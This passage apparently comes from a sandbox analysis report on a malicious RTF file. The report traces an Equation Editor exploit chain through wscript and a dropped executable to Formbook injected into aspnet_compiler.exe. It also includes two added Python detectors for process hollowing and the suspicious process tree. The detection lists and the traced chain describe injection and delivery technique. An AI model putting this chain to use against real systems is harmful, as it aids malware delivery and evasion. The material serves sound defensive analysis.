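The NT calls resolved by the code injected into aspnet_compiler.exe above (NtCreateProcessEx, NtOpenProcess, NtUnmapViewOfSection, NtCreateSection, NtMapViewOfSection, NtWriteVirtualMemory, NtGetContextThread, NtSetContextThread, NtResumeThread, NtQueueApcThread) are the building blocks of process hollowing and thread hijacking, which is why the report flags "Injects a PE file into a foreign processes" and "Writes to foreign memory regions". The Python below is an added example, not part of the Joe Sandbox report: it parses lines shaped like the "Code function" entries above, groups the Nt* names per image and scores them against the stages of a hollowing sequence. The sample lines are constructed (a benign wscript.exe control is included), and the stage table, the five-stage threshold and the line format are assumptions of the example.

```python
"""Score the Nt* stubs a process resolves against a process-hollowing profile.

Added example.  SAMPLE_LINES are constructed to match the shape of the
sandbox 'Code function' entries, not copied from the report.
"""
import re

SAMPLE_LINES = """
Source: aspnet_compiler.exe Code function: 7_2_0090FC30 NtOpenProcess
Source: aspnet_compiler.exe Code function: 7_2_0090FFFC NtCreateProcessEx
Source: aspnet_compiler.exe Code function: 7_2_0090FC90 NtUnmapViewOfSection
Source: aspnet_compiler.exe Code function: 7_2_0090FFB4 NtCreateSection
Source: aspnet_compiler.exe Code function: 7_2_0090FC60 NtMapViewOfSection
Source: aspnet_compiler.exe Code function: 7_2_0090FE24 NtWriteVirtualMemory
Source: aspnet_compiler.exe Code function: 7_2_00910C40 NtGetContextThread
Source: aspnet_compiler.exe Code function: 7_2_00911930 NtSetContextThread
Source: aspnet_compiler.exe Code function: 7_2_00910078 NtResumeThread
Source: aspnet_compiler.exe Code function: 7_2_0090FF34 NtQueueApcThread
Source: aspnet_compiler.exe Code function: 7_2_0090FD8C NtDelayExecution
Source: wscript.exe Code function: 5_2_00401000 NtClose
""".strip().splitlines()

# "Source: <image> Code function: <pid>_<snapshot>_<addr> <NtApi>"
LINE_RE = re.compile(
    r"Source:\s*(?P<image>.+?)\s+Code function:\s*"
    r"\d+_\d+_[0-9A-Fa-f]+\s+(?P<api>Nt\w+)"
)

# One stage per step of a classic hollowing / thread-hijack injection and
# the syscalls that can implement it (assumption: any one API per stage
# counts as that stage being present).
HOLLOWING_STAGES = {
    "target":   {"NtCreateProcessEx", "NtOpenProcess"},
    "unmap":    {"NtUnmapViewOfSection"},
    "map":      {"NtCreateSection", "NtMapViewOfSection", "NtAllocateVirtualMemory"},
    "write":    {"NtWriteVirtualMemory"},
    "redirect": {"NtSetContextThread", "NtQueueApcThread"},
    "run":      {"NtResumeThread"},
}


def parse_apis(lines):
    """Return {image_basename: {NtApi, ...}} for every matching line."""
    seen = {}
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        image = m["image"].rsplit("\\", 1)[-1].lower()  # strip any path
        seen.setdefault(image, set()).add(m["api"])
    return seen


def hollowing_score(apis):
    """Return (stages_hit, stages_total, names_of_stages_hit)."""
    hit = [stage for stage, cands in HOLLOWING_STAGES.items() if apis & cands]
    return len(hit), len(HOLLOWING_STAGES), hit


def classify(lines, threshold=5):
    """Return {image: 'hollowing' | 'benign'} using the stage count."""
    verdicts = {}
    for image, apis in parse_apis(lines).items():
        hit, _, _ = hollowing_score(apis)
        verdicts[image] = "hollowing" if hit >= threshold else "benign"
    return verdicts


if __name__ == "__main__":
    for image, apis in parse_apis(SAMPLE_LINES).items():
        hit, total, stages = hollowing_score(apis)
        print(f"{image}: {hit}/{total} stages {stages} -> {classify(SAMPLE_LINES)[image]}")
```

Resolved stubs show capability, not execution: a sandbox API trace or ETW threat-intelligence events would confirm the calls fired, and debuggers and some packers resolve the same cluster, so use the score to prioritise samples rather than to convict them on its own.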
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 6_2_00187020
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 6_2_001828E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 6_2_00182108
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 6_2_00186721
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 6_2_001820F8
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Code function: 6_2_00180A78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0040F803
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_004160B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_00401260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0040FA23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_00402ADD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_00402AE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0040DAA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_00402340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0042E333
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_00402334
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_00402E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0040F7FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0091E0C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0091E2E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_009C63BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_009463DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_00922305
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0096A37B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_009A443E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0093C5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_009A05E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_00966540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_00924680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0092E6C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0096A634
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_009C2622
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0092C7BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0092C85C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0094286D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_009C098E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_009229B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_009369FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_009B49F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_009CCBA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_009A6BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_009C2C9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_009AAC5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_00950D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0092CD5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_00952E2F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0093EE4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_009BCFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_00992FDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_00930F3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0094D005
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0093905A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_00923040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0099D06D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_009AD13F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_009C1238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0091F3CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_00927353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_00955485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_00931489
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0095D47D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_009C35DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0092351F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_009A579A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_009557C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_009B771D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0099F8C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_009BF8EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_009A5955
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_009A394B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_009D3A83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_009ADBDA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0091FBD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_00947B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_009BFDDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_009ABF14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 7_2_0094DF7C
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\temp_executable.exe E350330729257731AC3E4CB80CFCB243F8FD629A2AB5BC11D7A1E89B3945C716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: String function 0091E2A8 appears 60 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: String function 0091DF5C appears 130 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: String function 0098F970 appears 84 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: String function 0096373B appears 253 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: String function 00963F92 appears 132 times
Source: eMJ2QgQF4u.rtf, type: SAMPLE | Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents.
Source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.383276481.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.383140999.0000000000100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 6.2.temp_executable.exe.2b0000.1.raw.unpack, cb2e7c6ba8be0ef5b6ef7a92b800a3bbc.cs | Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
Source: 6.2.temp_executable.exe.26c31c8.6.raw.unpack, cb2e7c6ba8be0ef5b6ef7a92b800a3bbc.cs | Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
Source: 6.2.temp_executable.exe.26bb524.8.raw.unpack, cb2e7c6ba8be0ef5b6ef7a92b800a3bbc.cs | Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
Source: classification engine | Classification label: mal100.troj.expl.evad.winRTF@9/10@1/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$J2QgQF4u.rtf
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Mutant created: NULL
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR7D1B.tmp
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: eMJ2QgQF4u.rtf | ReversingLabs: Detection: 47%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
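The process tree above (WINWORD.EXE -> EQNEDT32.EXE -> wscript.exe -> temp_executable.exe -> aspnet_compiler.exe launched with an empty command line) is exactly what the Sigma hits "Suspicious Microsoft Office Child Process", "WScript or CScript Dropper" and the Equation Editor rules key on. The Python below is an added example, not code from the Joe Sandbox report: it reconstructs that chain from process-creation events and emits one finding per suspicious parent/child edge, then walks the lineage of the final process back to its Office root. The events are constructed to mirror the "Process created" lines above, with invented PIDs and a benign explorer.exe control; the list of hollowing targets beyond aspnet_compiler.exe is an assumption drawn from commonly abused .NET framework binaries rather than from this report.

```python
"""Detect the Office -> Equation Editor -> script host -> dropped EXE ->
hollowed .NET binary chain from process-creation events.

Added example.  EVENTS are constructed from the report's process tree;
the PIDs are invented and the explorer.exe entry is a benign control.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full image path, as the sandbox prints it
    cmdline: str


EVENTS = [
    ProcEvent(100, 1, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
              r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding'),
    ProcEvent(200, 100, r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
              r'"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'),
    ProcEvent(300, 200, r"C:\Windows\SysWOW64\wscript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs"'),
    ProcEvent(400, 300, r"C:\Users\user\AppData\Local\Temp\temp_executable.exe",
              r'"C:\Users\user\AppData\Local\Temp\temp_executable.exe"'),
    ProcEvent(500, 400, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"'),
    ProcEvent(600, 1, r"C:\Windows\explorer.exe", "explorer.exe"),   # benign control
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe"}
# Assumption: aspnet_compiler.exe is from the report; the rest are other
# .NET framework binaries commonly used as hollowing targets.
HOLLOW_TARGETS = {"aspnet_compiler.exe", "regsvcs.exe", "regasm.exe",
                  "msbuild.exe", "installutil.exe"}


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def in_user_writable_dir(path):
    """True for locations a non-admin user can drop files into."""
    p = path.lower()
    return "\\appdata\\" in p or "\\temp\\" in p or "\\users\\public\\" in p


def detect_chain(events):
    """Return [(child_pid, finding_name), ...] for every suspicious edge."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None:
            continue
        pname, cname = basename(parent.image), basename(e.image)
        if pname in OFFICE_APPS and cname == "eqnedt32.exe":
            findings.append((e.pid, "office_spawned_equation_editor"))
        if pname == "eqnedt32.exe" and cname in SCRIPT_HOSTS:
            findings.append((e.pid, "equation_editor_spawned_script_host"))
        if pname in SCRIPT_HOSTS and in_user_writable_dir(e.image):
            findings.append((e.pid, "script_host_launched_dropped_exe"))
        if cname in HOLLOW_TARGETS and in_user_writable_dir(parent.image):
            findings.append((e.pid, "dropped_exe_spawned_hollowing_target"))
    return findings


def lineage(events, pid):
    """Image names from the outermost known ancestor down to `pid`."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return list(reversed(chain))


if __name__ == "__main__":
    for pid, name in detect_chain(EVENTS):
        print(f"pid {pid}: {name}")
    print(" -> ".join(lineage(EVENTS, 500)))
```

Sysmon Event ID 1 or EDR process-start telemetry supplies the same four fields. The last edge relies on the parent living in a user-writable directory and on the child being a known hollowing target; since installers also run .NET binaries from %TEMP%, pair that edge in production with a remote-thread or mapped-section signal (the NtUnmapViewOfSection / NtWriteVirtualMemory / NtResumeThread cluster seen earlier in this report) rather than convicting on the parent path alone.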
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64win.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64cpu.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: msi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: cryptsp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rpcrtremote.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dwmapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: version.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: secur32.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: winhttp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: webio.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: iphlpapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: winnsi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dnsapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: nlaapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dhcpcsvc6.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rasadhlp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: propsys.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: ntmarta.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msdart.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: bcrypt.dll
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: credssp.dll
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: wow64cpu.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64win.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64cpu.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: msi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: cryptsp.dll
